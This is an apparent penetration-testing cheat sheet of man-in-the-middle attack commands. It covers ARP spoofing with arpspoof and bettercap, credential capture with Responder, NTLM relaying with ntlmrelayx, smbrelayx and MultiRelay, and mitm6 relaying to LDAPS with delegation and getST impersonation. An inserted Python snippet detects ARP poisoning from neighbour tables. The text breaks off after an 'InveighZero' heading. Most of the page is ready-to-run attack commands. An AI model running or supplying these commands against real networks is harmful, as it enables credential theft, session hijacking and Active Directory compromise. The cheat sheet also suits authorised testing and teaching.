Man-in-the-Middle

ARP Cache Poisoning

Bettercap2

arp.spoof on

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
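
A defender-side check for the poisoning above, as an added example that is not part of the original page: it parses `ip neigh show` output captured on host 192.168.1.2 and flags a MAC that answers for several IPs, and an IP whose MAC changed between two snapshots. The sample tables, the 192.168.1.3 and 192.168.1.50 hosts and all MAC addresses are constructed.

```python
"""Flag ARP-cache-poisoning symptoms in `ip neigh show` output (added example)."""
from collections import defaultdict

def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` lines; entries without lladdr are skipped."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            idx = fields.index("lladdr")
            if idx + 1 < len(fields):
                table[fields[0]] = fields[idx + 1].lower()
    return table

def shared_macs(table):
    """MACs that answer for more than one IP, as {mac: [ips]}."""
    by_mac = defaultdict(set)
    for ip, mac in table.items():
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def changed_bindings(before, after):
    """IPs whose MAC differs between two snapshots, as {ip: (old_mac, new_mac)}."""
    return {ip: (before[ip], mac) for ip, mac in after.items()
            if ip in before and before[ip] != mac}

# Constructed sample data: neighbour table on 192.168.1.2 before and during poisoning.
BASELINE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.3 dev eth0 lladdr 00:11:22:33:44:03 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.77 dev eth0 FAILED
"""
POISONED = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.3 dev eth0 lladdr 00:11:22:33:44:03 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""

if __name__ == "__main__":
    before, after = parse_neigh(BASELINE), parse_neigh(POISONED)
    for mac, ips in shared_macs(after).items():
        print(f"ALERT {mac} claims {', '.join(ips)}")
    for ip, (old, new) in changed_bindings(before, after).items():
        print(f"ALERT {ip} moved {old} -> {new}")
```

A shared MAC can also be legitimate (proxy ARP, a multi-homed host, a virtual router address), so treat a hit on the gateway's IP as the high-priority case and confirm against a known-good MAC inventory.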

LLMNR/NBT-NS Poisoning and SMB Relay

Responder

Remember to start with these settings in Responder.conf:

SMB = Off     # Turn this off
HTTP = Off    # Turn this off

responder -I eth0 -rv
responder -I eth0 -r -d -w

Relay

ntlmrelayx

cme smb <CIDR> --gen-relay-list targets.txt
ntlmrelayx.py -tf targets.txt

smbrelayx

smbrelayx.py -h <target_IP> -c "ipconfig"

MultiRelay

python MultiRelay.py -t <IP target> -u ALL

mitm6

mitm6 -d example.local --ignore-nofqdn

Relay

ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpad

Exploit

getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USER

InveighZero

Works from Windows systems:
